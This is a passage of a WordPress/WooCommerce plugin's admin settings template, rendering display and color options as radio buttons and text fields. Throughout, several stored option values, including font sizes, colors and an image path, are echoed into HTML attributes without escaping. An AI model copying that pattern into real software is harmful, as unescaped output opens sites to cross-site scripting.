                                            <label for="qc_woo_tabbed_page_<?php echo $qc_woo_tabbed_page->ID; ?>"> <?php echo esc_html($qc_woo_tabbed_page->post_title); ?></label>
                                        </li>
                                    <?php } ?>
                                </ul>
                            </div>
                        </ul>

                    </div>

                </section>





                <input id="toggle3" type="radio" name="toggle"/>
                <label for="toggle3"><?php esc_html_e( 'Display Settings', 'woo-tabbed-category' ); ?></label>
                <section id="content3" class="wo_tabs_inner">
                    
                
                    <div class="admin_display_list admin_display_list_bg">
                        <p><?php esc_html_e( 'Display product price', 'woo-tabbed-category' ); ?></p>
                        <ul class="radio-list">
                            <li>
                                <input type="radio"
                                       name="display_price" <?php echo(get_option('display_price') == '1' ? 'checked' : ''); ?>
                                       value="1">
                                <?php esc_html_e( 'Yes', 'woo-tabbed-category' ); ?>
                            </li>
                            <li>
                                <input type="radio"
                                       name="display_price" <?php echo(get_option('display_price') == '0' ? 'checked' : ''); ?>
                                       value="0">
                                <?php esc_html_e( 'No', 'woo-tabbed-category' ); ?>
                            </li>
                        </ul>
                    </div>
                    <div class="admin_display_list admin_display_list_bg">
                        <p><?php esc_html_e( 'Display rating', 'woo-tabbed-category' ); ?></p>
                        <ul class="radio-list">
                            <li>
                                <input type="radio"
                                       name="display_rating" <?php echo(get_option('display_rating') == '1' ? 'checked' : ''); ?>
                                       value="1">
                                <?php esc_html_e( 'Yes', 'woo-tabbed-category' ); ?>
                            </li>
                            <li>
                                <input type="radio"
                                       name="display_rating" <?php echo(get_option('display_rating') == '0' ? 'checked' : ''); ?>
                                       value="0">
                                <?php esc_html_e( 'No', 'woo-tabbed-category' ); ?>
                            </li>
                        </ul>
                    </div>
                    <div class="admin_display_list admin_display_list_bg">
                        <p><?php esc_html_e( 'Display product title', 'woo-tabbed-category' ); ?></p>
                        <ul class="radio-list">
                            <li>
                                <input type="radio"
                                       name="product_title" <?php echo(get_option('product_title') == '1' ? 'checked' : ''); ?>
                                       value="1">
                                <?php esc_html_e( 'Yes', 'woo-tabbed-category' ); ?>
                            </li>
                            <li>
                                <input type="radio"
                                       name="product_title" <?php echo(get_option('product_title') == '0' ? 'checked' : ''); ?>
                                       value="0">
                                <?php esc_html_e( 'No', 'woo-tabbed-category' ); ?>
                            </li>
                        </ul>
                    </div>
                    <div class="admin_display_list admin_display_list_bg">
                        <p><?php esc_html_e( 'Display add to cart link', 'woo-tabbed-category' ); ?></p>
                        <ul class="radio-list">
                            <li>
                                <input type="radio"
                                       name="add_cart_link" <?php echo(get_option('add_cart_link') == '1' ? 'checked' : ''); ?>
                                       value="1">
                                <?php esc_html_e( 'Yes', 'woo-tabbed-category' ); ?>
                            </li>
                            <li>
                                <input type="radio"
                                       name="add_cart_link" <?php echo(get_option('add_cart_link') == '0' ? 'checked' : ''); ?>
                                       value="0">
                                <?php esc_html_e( 'No', 'woo-tabbed-category' ); ?>
                            </li>
                        </ul>
                    </div>
                    <div class="admin_display_list admin_display_list_bg">
                        <p><?php esc_html_e( 'Display product quantity selection textbox', 'woo-tabbed-category' ); ?></p>
                        <ul class="radio-list">
                            <li>
                                <input type="radio"
                                       name="add_quantity_select" <?php echo(get_option('add_quantity_select') == '1' ? 'checked' : ''); ?>
                                       value="1">
                                <?php esc_html_e( 'Yes', 'woo-tabbed-category' ); ?>
                            </li>
                            <li>
                                <input type="radio"
                                       name="add_quantity_select" <?php echo(get_option('add_quantity_select') == '0' ? 'checked' : ''); ?>
                                       value="0">
                                <?php esc_html_e( 'No', 'woo-tabbed-category' ); ?>
                            </li>
                        </ul>
                    </div>


                    <div class="admin_display_list admin_display_list_bg">
                        <p><?php esc_html_e( 'Category filters font size: ( px )', 'woo-tabbed-category' ); ?></p>
                        <input type="text" name="product_category_text_font_size"
                               value="<?php echo get_option('product_category_text_font_size'); ?>">
                    </div>


                    <div class="admin_display_list admin_display_list_bg">
                        <p><?php esc_html_e( 'Product title text size ( px )', 'woo-tabbed-category' ); ?></p>
                        <input type="text" name="change_title_text_size"
                               value="<?php echo get_option('change_title_text_size'); ?>">
                    </div>
                    <div class="admin_display_list admin_display_list_bg">
                        <p><?php esc_html_e( 'Product content text size ( px )', 'woo-tabbed-category' ); ?></p>
                        <input type="text" name="product_content_text_size"
                               value="<?php echo get_option('product_content_text_size'); ?>">
                    </div>




                    <div class="admin_display_list admin_display_list_bg">
                        <p><?php esc_html_e( 'Category filter display type', 'woo-tabbed-category' ); ?></p>
                        <ul class="radio-list">
                            <li>
                                <input type="radio"
                                       name="category_style" <?php echo(get_option('category_style') == '1' ? 'checked' : ''); ?>
                                       value="1">
                                <?php esc_html_e( 'Scroll', 'woo-tabbed-category' ); ?>
                            </li>
                            <li>
                                <input type="radio"
                                       name="category_style" <?php echo(get_option('category_style') == '2' ? 'checked' : ''); ?>
                                       value="2">
                                <?php esc_html_e( 'Stack', 'woo-tabbed-category' ); ?>
                            </li>
                        </ul>
                    </div>

                    <div class="admin_display_list admin_display_list_bg">
                        <p><?php esc_html_e( 'Category filters in Mobile', 'woo-tabbed-category' ); ?></p>
                        <ul class="radio-list">
                            <li>
                                <input type="radio"
                                       name="qc_slick_slider_on_off" <?php echo(get_option('qc_slick_slider_on_off') == 'on' ? 'checked' : ''); ?>
                                       value="on">
                                <?php esc_html_e( 'Scroll', 'woo-tabbed-category' ); ?>
                            </li>
                            <li>
                                <input type="radio"
                                       name="qc_slick_slider_on_off" <?php echo(get_option('qc_slick_slider_on_off') == 'off' ? 'checked' : ''); ?>
                                       value="off">
                                <?php esc_html_e( 'Stack', 'woo-tabbed-category' ); ?>
                            </li>
                        </ul>

                    </div>

                    <div class="admin_display_list admin_display_list_bg">
                        <p><?php esc_html_e( 'Show categories as dropdown in Mobile', 'woo-tabbed-category' ); ?></p>
                        <ul class="radio-list">
                            <li>
                                <input type="radio"
                                       name="qcld_woo_tabbed_show_category_dropdown" <?php echo(get_option('qcld_woo_tabbed_show_category_dropdown') == 'on' ? 'checked' : ''); ?>
                                       value="on">
                                <?php esc_html_e( 'On', 'woo-tabbed-category' ); ?>
                            </li>
                            <li>
                                <input type="radio"
                                       name="qcld_woo_tabbed_show_category_dropdown" <?php echo(get_option('qcld_woo_tabbed_show_category_dropdown') == 'off' ? 'checked' : ''); ?>
                                       value="off">
                                <?php esc_html_e( 'Off', 'woo-tabbed-category' ); ?>
                            </li>
                        </ul>

                    </div>

                    <div class="admin_display_list admin_display_list_bg">
                        <p><?php esc_html_e( 'Category filter auto scroll/slide', 'woo-tabbed-category' ); ?></p>
                        <ul class="radio-list">
                            <li>
                                <input type="radio"
                                       name="qc_slick_slider_auto_scroll_on_off" <?php echo(get_option('qc_slick_slider_auto_scroll_on_off') == 'true' ? 'checked' : ''); ?>
                                       value="true">
                                <?php esc_html_e( 'Enable', 'woo-tabbed-category' ); ?>
                            </li>
                            <li>
                                <input type="radio"
                                       name="qc_slick_slider_auto_scroll_on_off" <?php echo(get_option('qc_slick_slider_auto_scroll_on_off') == 'false' ? 'checked' : ''); ?>
                                       value="false">
                                <?php esc_html_e( 'Disable', 'woo-tabbed-category' ); ?>
                            </li>
                        </ul>

                    </div>

                    <div class="admin_display_list admin_display_list_bg">
                        <p><?php esc_html_e( 'Category filter auto scroll/slide infinite', 'woo-tabbed-category' ); ?></p>
                        <ul class="radio-list">
                            <li>
                                <input type="radio"
                                       name="qc_slick_slider_auto_scroll_infinite_on_off" <?php echo(get_option('qc_slick_slider_auto_scroll_infinite_on_off') == 'true' ? 'checked' : ''); ?>
                                       value="true">
                                <?php esc_html_e( 'Enable', 'woo-tabbed-category' ); ?>
                            </li>
                            <li>
                                <input type="radio"
                                       name="qc_slick_slider_auto_scroll_infinite_on_off" <?php echo(get_option('qc_slick_slider_auto_scroll_infinite_on_off') == 'false' ? 'checked' : ''); ?>
                                       value="false">
                                <?php esc_html_e( 'Disable', 'woo-tabbed-category' ); ?>
                            </li>
                        </ul>

                    </div>


                    <div class="admin_display_list admin_display_list_bg">
                        <p><?php esc_html_e( 'Product Details Quick View', 'woo-tabbed-category' ); ?></p>
                        <ul class="radio-list">
                            <li>
                                <input type="radio"
                                       name="qc_quick_view_on_off" <?php echo(get_option('qc_quick_view_on_off') == 'on' ? 'checked' : ''); ?>
                                       value="on">
                                <?php esc_html_e( 'Enable', 'woo-tabbed-category' ); ?>
                            </li>
                            <li>
                                <input type="radio"
                                       name="qc_quick_view_on_off" <?php echo(get_option('qc_quick_view_on_off') == 'off' ? 'checked' : ''); ?>
                                       value="off">
                                <?php esc_html_e( 'Disable', 'woo-tabbed-category' ); ?>
                            </li>
                        </ul>

                    </div>
                    <div class="admin_display_list admin_display_list_bg" >
                        <p><?php esc_html_e( 'Fixed Position Category Filters (will not work with certain styles)', 'woo-tabbed-category' ); ?></p>
                        <ul class="radio-list">
                            <li>
                                <input type="radio"
                                       name="qc_category_filter_fixed_on_off" <?php echo(get_option('qc_category_filter_fixed_on_off') == 'on' ? 'checked' : ''); ?>
                                       value="on">
                                <?php esc_html_e( 'Enable', 'woo-tabbed-category' ); ?>
                            </li>
                            <li>
                                <input type="radio"
                                       name="qc_category_filter_fixed_on_off" <?php echo(get_option('qc_category_filter_fixed_on_off') == 'off' ? 'checked' : ''); ?>
                                       value="off">
                                <?php esc_html_e( 'Disable', 'woo-tabbed-category' ); ?>
                            </li>
                        </ul>

                    </div>
                    <div class="admin_display_list admin_display_list_bg" >
                        <p><?php esc_html_e( 'Fixed Position Category Filters work with full page after scroll', 'woo-tabbed-category' ); ?></p>
                        <ul class="radio-list">
                            <li>
                                <input type="radio"
                                       name="qc_category_filter_fixed_full_page_on_off" <?php echo(get_option('qc_category_filter_fixed_full_page_on_off') == 'on' ? 'checked' : ''); ?>
                                       value="on">
                                <?php esc_html_e( 'Enable', 'woo-tabbed-category' ); ?>
                            </li>
                            <li>
                                <input type="radio"
                                    name="qc_category_filter_fixed_full_page_on_off" <?php echo( (get_option('qc_category_filter_fixed_full_page_on_off') == 'off' || get_option('qc_category_filter_fixed_full_page_on_off') == '') ? 'checked' : ''); ?>
                                       value="off">
                                <?php esc_html_e( 'Disable', 'woo-tabbed-category' ); ?>
                            </li>
                        </ul>

                    </div>

                    <div class="admin_display_list admin_display_list_bg">
                        
                        <p> <?php esc_html_e( 'Theme 10 Carousel Template Category Filter Display', 'woo-tabbed-category' ); ?></p>
                        <ul class="radio-list">
                            <li><input type="radio" name="qc_woo_tabbed_enable_theme_10_navbar_menu_tab" <?php echo(get_option('qc_woo_tabbed_enable_theme_10_navbar_menu_tab') == 'enable' ? 'checked' : ''); ?> value="enable">  <?php esc_html_e( 'Top', 'woo-tabbed-category' ); ?></li>
                            <li><input type="radio" name="qc_woo_tabbed_enable_theme_10_navbar_menu_tab" <?php echo(get_option('qc_woo_tabbed_enable_theme_10_navbar_menu_tab') == '' ? 'checked' : ''); ?> value="">  <?php esc_html_e( 'Bottom', 'woo-tabbed-category' ); ?></li>
                        </ul>

                    </div>

                    <div class="admin_display_list admin_display_list_bg">
                        
                        <p> <?php esc_html_e( 'Display Category Image with Category filter', 'woo-tabbed-category' ); ?></p>
                        <ul class="radio-list">
                            <li><input type="radio" name="qc_woo_tabbed_enable_category_image" <?php echo(get_option('qc_woo_tabbed_enable_category_image') == 'enable' ? 'checked' : ''); ?> value="enable">  <?php esc_html_e( 'Enable', 'woo-tabbed-category' ); ?></li>
                            <li><input type="radio" name="qc_woo_tabbed_enable_category_image" <?php echo(get_option('qc_woo_tabbed_enable_category_image') == '' ? 'checked' : ''); ?> value="">  <?php esc_html_e( 'Disable', 'woo-tabbed-category' ); ?></li>
                        </ul>

                    </div>

                    <div class="admin_display_list admin_display_list_bg">
                        
                        <p> <?php esc_html_e( 'Display Product Tag below Category filter', 'woo-tabbed-category' ); ?></p>
                        <ul class="radio-list">
                            <li><input type="radio" name="qc_woo_tabbed_enable_product_tag_filter" <?php echo(get_option('qc_woo_tabbed_enable_product_tag_filter') == 'enable' ? 'checked' : ''); ?> value="enable">  <?php esc_html_e( 'Enable', 'woo-tabbed-category' ); ?></li>
                            <li><input type="radio" name="qc_woo_tabbed_enable_product_tag_filter" <?php echo(get_option('qc_woo_tabbed_enable_product_tag_filter') == '' ? 'checked' : ''); ?> value="">  <?php esc_html_e( 'Disable', 'woo-tabbed-category' ); ?></li>
                        </ul>

                    </div>

                    <div class="admin_display_list admin_display_list_bg">
                        
                        <p> <?php esc_html_e( 'Alert message when a product is added to cart', 'woo-tabbed-category' ); ?></p>
                        <ul class="radio-list">
                            <li><input type="radio" name="qc_woo_tabbed_enable_product_alert_message_success" <?php echo(get_option('qc_woo_tabbed_enable_product_alert_message_success') == 'enable' ? 'checked' : ''); ?> value="enable">  <?php esc_html_e( 'Enable', 'woo-tabbed-category' ); ?></li>
                            <li><input type="radio" name="qc_woo_tabbed_enable_product_alert_message_success" <?php echo(get_option('qc_woo_tabbed_enable_product_alert_message_success') == '' ? 'checked' : ''); ?> value="">  <?php esc_html_e( 'Disable', 'woo-tabbed-category' ); ?></li>
                        </ul>

                    </div>

                    <div class="admin_display_list admin_display_list_bg">
                        
                        <p> <?php esc_html_e( 'Alert message when a product is added to cart on Mobile View', 'woo-tabbed-category' ); ?></p>
                        <ul class="radio-list">
                            <li><input type="radio" name="qc_woo_tabbed_enable_product_alert_message_success_mobile" <?php echo(get_option('qc_woo_tabbed_enable_product_alert_message_success_mobile') == 'enable' ? 'checked' : ''); ?> value="enable">  <?php esc_html_e( 'Enable', 'woo-tabbed-category' ); ?></li>
                            <li><input type="radio" name="qc_woo_tabbed_enable_product_alert_message_success_mobile" <?php echo(get_option('qc_woo_tabbed_enable_product_alert_message_success_mobile') == '' ? 'checked' : ''); ?> value="">  <?php esc_html_e( 'Disable', 'woo-tabbed-category' ); ?></li>
                        </ul>

                    </div>

                    <div class="admin_display_list admin_display_list_bg">
                        
                        <p> <?php esc_html_e( 'If your modal variable product ajax Add to cart button not work ( If working no need enable )', 'woo-tabbed-category' ); ?></p>
                        <ul class="radio-list">
                            <li><input type="radio" name="qc_woo_tabbed_enable_product_variable_add_to_cart" <?php echo(get_option('qc_woo_tabbed_enable_product_variable_add_to_cart') == 'enable' ? 'checked' : ''); ?> value="enable">  <?php esc_html_e( 'Enable', 'woo-tabbed-category' ); ?></li>
                            <li><input type="radio" name="qc_woo_tabbed_enable_product_variable_add_to_cart" <?php echo(get_option('qc_woo_tabbed_enable_product_variable_add_to_cart') == '' ? 'checked' : ''); ?> value="">  <?php esc_html_e( 'Disable', 'woo-tabbed-category' ); ?></li>
                        </ul>

                    </div>

                    <div class="admin_display_list admin_display_list_bg">
                        
                        <p> <?php esc_html_e( 'Not Display Out Of Stock Product', 'woo-tabbed-category' ); ?></p>
                        <ul class="radio-list">
                            <li><input type="radio" name="qc_woo_tabbed_disable_product_out_of_stock" <?php echo(get_option('qc_woo_tabbed_disable_product_out_of_stock') == 'enable' ? 'checked' : ''); ?> value="enable">  <?php esc_html_e( 'Enable', 'woo-tabbed-category' ); ?></li>
                            <li><input type="radio" name="qc_woo_tabbed_disable_product_out_of_stock" <?php echo(get_option('qc_woo_tabbed_disable_product_out_of_stock') == '' ? 'checked' : ''); ?> value="">  <?php esc_html_e( 'Disable', 'woo-tabbed-category' ); ?></li>
                        </ul>

                    </div>

                    <div class="admin_display_list admin_display_list_bg">
                        
                        <p> <?php esc_html_e( 'Display product tags', 'woo-tabbed-category' ); ?></p>
                        <ul class="radio-list">
                            <li><input type="radio" name="qc_woo_tabbed_display_product_tag" <?php echo(get_option('qc_woo_tabbed_display_product_tag') == 'enable' ? 'checked' : ''); ?> value="enable">  <?php esc_html_e( 'Enable', 'woo-tabbed-category' ); ?></li>
                            <li><input type="radio" name="qc_woo_tabbed_display_product_tag" <?php echo(get_option('qc_woo_tabbed_display_product_tag') == '' ? 'checked' : ''); ?> value="">  <?php esc_html_e( 'Disable', 'woo-tabbed-category' ); ?></li>
                        </ul>

                    </div>

                    <div class="admin_display_list admin_display_list_bg">
                        
                        <p> <?php esc_html_e( 'Show Category Images at Top', 'woo-tabbed-category' ); ?></p>
                        <ul class="radio-list">
                            <li><input type="radio" name="qc_woo_tabbed_display_category_image_top" <?php echo(get_option('qc_woo_tabbed_display_category_image_top') == 'enable' ? 'checked' : ''); ?> value="enable">  <?php esc_html_e( 'Enable', 'woo-tabbed-category' ); ?></li>
                            <li><input type="radio" name="qc_woo_tabbed_display_category_image_top" <?php echo(get_option('qc_woo_tabbed_display_category_image_top') == '' ? 'checked' : ''); ?> value="">  <?php esc_html_e( 'Disable', 'woo-tabbed-category' ); ?></li>
                        </ul>

                    </div>

                    <div class="admin_display_list admin_display_list_bg">
                        
                        <p> <?php esc_html_e( 'Show Category Images at Background', 'woo-tabbed-category' ); ?></p>
                        <ul class="radio-list">
                            <li><input type="radio" name="qc_woo_tabbed_display_category_image_bg" <?php echo(get_option('qc_woo_tabbed_display_category_image_bg') == 'enable' ? 'checked' : ''); ?> value="enable">  <?php esc_html_e( 'Enable', 'woo-tabbed-category' ); ?></li>
                            <li><input type="radio" name="qc_woo_tabbed_display_category_image_bg" <?php echo(get_option('qc_woo_tabbed_display_category_image_bg') == '' ? 'checked' : ''); ?> value="">  <?php esc_html_e( 'Disable', 'woo-tabbed-category' ); ?></li>
                        </ul>

                    </div>

                    <div class="admin_display_list admin_display_list_bg">
                        
                        <p> <?php esc_html_e( 'Show "Search" and "Sorting" on the category lists', 'woo-tabbed-category' ); ?></p>
                        <ul class="radio-list">
                            <li><input type="radio" name="qc_woo_tabbed_display_category_search_sort_top" <?php echo(get_option('qc_woo_tabbed_display_category_search_sort_top') == 'enable' ? 'checked' : ''); ?> value="enable">  <?php esc_html_e( 'Top', 'woo-tabbed-category' ); ?></li>
                            <li><input type="radio" name="qc_woo_tabbed_display_category_search_sort_top" <?php echo(get_option('qc_woo_tabbed_display_category_search_sort_top') == '' ? 'checked' : ''); ?> value="">  <?php esc_html_e( 'Bottom', 'woo-tabbed-category' ); ?></li>
                        </ul>

                    </div>



                    <div class="admin_display_list admin_display_list_bg">
                        
                        <p> <?php esc_html_e( 'RTL Support', 'woo-tabbed-category' ); ?></p>
                        <ul class="radio-list">
                            <li><input type="radio" name="qc_woo_tabbed_display_rtl_support" <?php echo(get_option('qc_woo_tabbed_display_rtl_support') == 'enable' ? 'checked' : ''); ?> value="enable">  <?php esc_html_e( 'Enable', 'woo-tabbed-category' ); ?></li>
                            <li><input type="radio" name="qc_woo_tabbed_display_rtl_support" <?php echo(get_option('qc_woo_tabbed_display_rtl_support') == '' ? 'checked' : ''); ?> value="">  <?php esc_html_e( 'Disable', 'woo-tabbed-category' ); ?></li>
                        </ul>

                    </div>

                    <div class="admin_display_list admin_display_list_bg">
                        
                        <p> <?php esc_html_e( 'Load categories with URL ', 'woo-tabbed-category' ); ?></p>
                        <ul class="radio-list">
                            <li><input type="radio" name="qc_woo_tabbed_display_category_url_based" <?php echo(get_option('qc_woo_tabbed_display_category_url_based') == 'enable' ? 'checked' : ''); ?> value="enable">  <?php esc_html_e( 'Enable', 'woo-tabbed-category' ); ?></li>
                            <li><input type="radio" name="qc_woo_tabbed_display_category_url_based" <?php echo(get_option('qc_woo_tabbed_display_category_url_based') == '' ? 'checked' : ''); ?> value="">  <?php esc_html_e( 'Disable', 'woo-tabbed-category' ); ?></li>
                        </ul>

                    </div>

                    <div class="admin_display_list admin_display_list_bg">
                        
                        <p> <?php esc_html_e( 'Show Default template category like sidebar', 'woo-tabbed-category' ); ?></p>
                        <ul class="radio-list">
                            <li><input type="radio" name="qc_woo_tabbed_display_default_template_sidebar" <?php echo(get_option('qc_woo_tabbed_display_default_template_sidebar') == 'enable' ? 'checked' : ''); ?> value="enable">  <?php esc_html_e( 'Enable', 'woo-tabbed-category' ); ?></li>
                            <li><input type="radio" name="qc_woo_tabbed_display_default_template_sidebar" <?php echo(get_option('qc_woo_tabbed_display_default_template_sidebar') == '' ? 'checked' : ''); ?> value="">  <?php esc_html_e( 'Disable', 'woo-tabbed-category' ); ?></li>
                        </ul>

                    </div>

                    <div class="admin_display_list admin_display_list_bg">
                        
                        <p> <?php esc_html_e( 'Template Eleven dropdown parent category clickable', 'woo-tabbed-category' ); ?></p>
                        <ul class="radio-list">
                            <li><input type="radio" name="qc_woo_tabbed_eleven_parent_category_clickable" <?php echo(get_option('qc_woo_tabbed_eleven_parent_category_clickable') == 'enable' ? 'checked' : ''); ?> value="enable">  <?php esc_html_e( 'Enable', 'woo-tabbed-category' ); ?></li>
                            <li><input type="radio" name="qc_woo_tabbed_eleven_parent_category_clickable" <?php echo(get_option('qc_woo_tabbed_eleven_parent_category_clickable') == '' ? 'checked' : ''); ?> value="">  <?php esc_html_e( 'Disable', 'woo-tabbed-category' ); ?></li>
                        </ul>

                    </div>

                    <div class="admin_display_list admin_display_list_bg">
                        
                        <p> <?php esc_html_e( 'Scroll to product section when click category', 'woo-tabbed-category' ); ?></p>
                        <ul class="radio-list">
                            <li><input type="radio" name="qc_woo_tabbed_scroll_category_clickable" <?php echo(get_option('qc_woo_tabbed_scroll_category_clickable') == 'enable' ? 'checked' : ''); ?> value="enable">  <?php esc_html_e( 'Enable', 'woo-tabbed-category' ); ?></li>
                            <li><input type="radio" name="qc_woo_tabbed_scroll_category_clickable" <?php echo(get_option('qc_woo_tabbed_scroll_category_clickable') == '' ? 'checked' : ''); ?> value="">  <?php esc_html_e( 'Disable', 'woo-tabbed-category' ); ?></li>
                        </ul>

                    </div>

                    <div class="admin_display_list admin_display_list_bg">
                        
                        <p> <?php esc_html_e( 'Show columns on mobile product view', 'woo-tabbed-category' ); ?></p>
                        <ul class="radio-list">
                            <li><input type="radio" name="qc_woo_tabbed_columns_mobile_product_view" <?php echo(get_option('qc_woo_tabbed_columns_mobile_product_view') == '' ? 'checked' : ''); ?> value="">  <?php esc_html_e( 'One', 'woo-tabbed-category' ); ?></li>
                            <li><input type="radio" name="qc_woo_tabbed_columns_mobile_product_view" <?php echo(get_option('qc_woo_tabbed_columns_mobile_product_view') == 'two' ? 'checked' : ''); ?> value="two">  <?php esc_html_e( 'Two', 'woo-tabbed-category' ); ?></li>
                        </ul>

                    </div>

                    <div class="admin_display_list admin_display_list_bg">
                        
                        <p> <?php esc_html_e( 'Product hover gallery image fade in and out', 'woo-tabbed-category' ); ?></p>
                        <ul class="radio-list">
                            <li><input type="radio" name="qc_woo_tabbed_product_hover_gallery_image" <?php echo(get_option('qc_woo_tabbed_product_hover_gallery_image') == 'enable' ? 'checked' : ''); ?> value="enable">  <?php esc_html_e( 'Enable', 'woo-tabbed-category' ); ?></li>
                            <li><input type="radio" name="qc_woo_tabbed_product_hover_gallery_image" <?php echo(get_option('qc_woo_tabbed_product_hover_gallery_image') == '' ? 'checked' : ''); ?> value="">  <?php esc_html_e( 'Disable', 'woo-tabbed-category' ); ?></li>
                        </ul>

                    </div>

                    <div class="admin_display_list admin_display_list_bg">
                        
                        <p> <?php esc_html_e( 'Shortcode Preview with Page Builder (ex: Elementor)', 'woo-tabbed-category' ); ?></p>
                        <ul class="radio-list">
                            <li><input type="radio" name="qc_woo_tabbed_shortcode_preview" <?php echo(get_option('qc_woo_tabbed_shortcode_preview') == 'enable' ? 'checked' : ''); ?> value="enable">  <?php esc_html_e( 'Enable', 'woo-tabbed-category' ); ?></li>
                            <li><input type="radio" name="qc_woo_tabbed_shortcode_preview" <?php echo(get_option('qc_woo_tabbed_shortcode_preview') == '' ? 'checked' : ''); ?> value="">  <?php esc_html_e( 'Disable', 'woo-tabbed-category' ); ?></li>
                        </ul>

                    </div>
                    <div class="admin_display_list admin_display_list_bg">
                        <p><?php esc_html_e( 'Style Thirteen Category Button Mode', 'woo-tabbed-category' ); ?></p>
                        <ul class="radio-list">
                            <li>
                                <input type="radio"
                                       name="thirteen_category_btn_mode" <?php echo(get_option('thirteen_category_btn_mode') == '1' ? 'checked' : ''); ?>
                                       value="1">
                                <?php esc_html_e( 'Scroll', 'woo-tabbed-category' ); ?>
                            </li>
                            <li>
                                <input type="radio"
                                       name="thirteen_category_btn_mode" <?php echo(get_option('thirteen_category_btn_mode') == '2' ? 'checked' : ''); ?>
                                       value="2">
                                <?php esc_html_e( 'Stack', 'woo-tabbed-category' ); ?>
                            </li>
                        </ul>
                    </div>
                    <div class="admin_display_list admin_display_list_bg">
                        <p><?php esc_html_e( 'Enable Style Thirteen Read More Button', 'woo-tabbed-category' ); ?></p>
                        <ul class="radio-list qcld_read_more">
                            <li>
                                <input type="radio"
                                       name="thirteen_category_read_more_btn" <?php echo(get_option('thirteen_category_read_more_btn') == '' ? 'checked' : ''); ?>
                                       value="">
                                <?php esc_html_e( 'Read More', 'woo-tabbed-category' ); ?>
                            </li>
                            <li>
                                <input type="radio"
                                       name="thirteen_category_read_more_btn" <?php echo(get_option('thirteen_category_read_more_btn') == '1' ? 'checked' : ''); ?>
                                       value="1">
                                <?php esc_html_e( 'Read More With single Page Link', 'woo-tabbed-category' ); ?>
                            </li>
                            <li>
                                <input type="radio"
                                       name="thirteen_category_read_more_btn" <?php echo(get_option('thirteen_category_read_more_btn') == '2' ? 'checked' : ''); ?>
                                       value="2">
                                <?php esc_html_e( 'Read More Button Show after whole paragraph', 'woo-tabbed-category' ); ?>
                            </li>
                        </ul>
                    </div>

                    <div class="admin_display_list admin_display_list_bg">
                        <p><?php esc_html_e( 'Style Thirteen Read More maximum word', 'woo-tabbed-category' ); ?></p>
                        <input type="number" name="thirteen_category_rm_max_word" value="<?php echo get_option('thirteen_category_rm_max_word'); ?>">
                    </div>


                    <div class="admin_display_list admin_display_list_bg">
                        
                        <p> <?php esc_html_e( 'Display SubCategories below the Categories as Tabs', 'woo-tabbed-category' ); ?></p>
                        <ul class="radio-list">
                            <li><input type="radio" name="qc_woo_tabbed_enable_cat_sub_cat_filter" <?php echo(get_option('qc_woo_tabbed_enable_cat_sub_cat_filter') == 'enable' ? 'checked' : ''); ?> value="enable">  <?php esc_html_e( 'Enable', 'woo-tabbed-category' ); ?></li>
                            <li><input type="radio" name="qc_woo_tabbed_enable_cat_sub_cat_filter" <?php echo(get_option('qc_woo_tabbed_enable_cat_sub_cat_filter') == '' ? 'checked' : ''); ?> value="">  <?php esc_html_e( 'Disable', 'woo-tabbed-category' ); ?></li>
                        </ul>

                    </div>


                    <div class="admin_display_list admin_display_list_bg">
                        
                        <p> <?php esc_html_e( 'Replace Related Products with Categories as Tabs in Product Single Page', 'woo-tabbed-category' ); ?></p>
                        <ul class="radio-list">
                            <li><input type="radio" name="qc_woo_tabbed_enable_related_product_replace" <?php echo(get_option('qc_woo_tabbed_enable_related_product_replace') == 'enable' ? 'checked' : ''); ?> value="enable">  <?php esc_html_e( 'Enable', 'woo-tabbed-category' ); ?></li>
                            <li><input type="radio" name="qc_woo_tabbed_enable_related_product_replace" <?php echo(get_option('qc_woo_tabbed_enable_related_product_replace') == '' ? 'checked' : ''); ?> value="">  <?php esc_html_e( 'Disable', 'woo-tabbed-category' ); ?></li>
                        </ul>

                    </div>

                    <div class="admin_display_list admin_display_list_bg" style="display: block !important">

                        
                       <div id="top-section">
                        <div class="row">
                            <div class="col-sm-12">
                                <p>
                                    <?php _e('Loading Image', 'woo-tabbed-category'); ?>
                                </p>
                                <div class="cxsc-settings-blocks">
                                    <input value="1" id="qcld_woo_tabbed_change_loading_image" type="checkbox" name="qcld_woo_tabbed_change_loading_image" <?php echo(get_option( 'qcld_woo_tabbed_change_loading_image')==1 ? 'checked' : ''); ?>>
                                    <label for="qcld_woo_tabbed_change_loading_image">
                                        <?php _e('Change the Loading Effect Gif Image (except mini mode).', 'woo-tabbed-category'); ?>
                                    </label>
                                </div>
                        
                                <div class="qcld_woo_tabbed-board-bg-container" <?php if (get_option( 'qcld_woo_tabbed_change_loading_image') !=1 ) { echo 'style="display:none"'; } ?>>
                                  
                                        <span class="woo-chatbot-settings-instruction">
                                            <?php _e('Upload Loading Gif Image (Ideal image size 200px X 200px).', 'woo-tabbed-category'); ?>
                                        </span>
                                        <div class="cxsc-settings-blocks">
                                            <?php
                                            if (get_option('qcld_woo_tabbed_board_bg_path') != "") {
                                                $qcld_woo_tabbed_board_bg_path = get_option('qcld_woo_tabbed_board_bg_path');
                                            } else {
                                                $qcld_woo_tabbed_board_bg_path = '';
                                            }
                                            ?>
                                                <input type="hidden" name="qcld_woo_tabbed_board_bg_path" id="qcld_woo_tabbed_board_bg_path" value="<?php echo $qcld_woo_tabbed_board_bg_path; ?>" />
                                                <button type="button" class="qcld_woo_tabbed_board_bg_button button">
                                                    <?php _e('Upload  Image.', 'woo-tabbed-category'); ?>
                                                </button>
                                        </div>
                                  
                                        <img id="qcld_woo_tabbed_board_bg_image" style="height:200px;width:200px" src="<?php echo $qcld_woo_tabbed_board_bg_path; ?>" alt="">
                                </div>


                            </div>
                        </div>
    

                    </div>

                    
                </section>

                <input id="toggle4" type="radio" name="toggle"/>
                <label for="toggle4"><?php esc_html_e( 'Color Settings', 'woo-tabbed-category' ); ?></label>
                <section id="content4" class="wo_tabs_inner">        
                  <div class="admin_display_list_3">
                        <p><?php esc_html_e( 'Container background color:', 'woo-tabbed-category' ); ?></p>
                        <input type="text" name="container_background_color"
                               value="<?php echo get_option('container_background_color'); ?>"
                               class="container-bg-color">
                    </div>
                    <div class="admin_display_list_3">
                        <p><?php esc_html_e( 'Product title text color:', 'woo-tabbed-category' ); ?></p>
                        <input type="text" name="product_title_text_color"
                               value="<?php echo get_option('product_title_text_color'); ?>"
                               class="container-bg-color">
                    </div>
                    <div class="admin_display_list_3">
                        <p><?php esc_html_e( 'Product content text color:', 'woo-tabbed-category' ); ?></p>
                        <input type="text" name="product_content_text_color"
                               value="<?php echo get_option('product_content_text_color'); ?>"
                               class="container-bg-color">
                    </div>
                    <div class="admin_display_list_3">
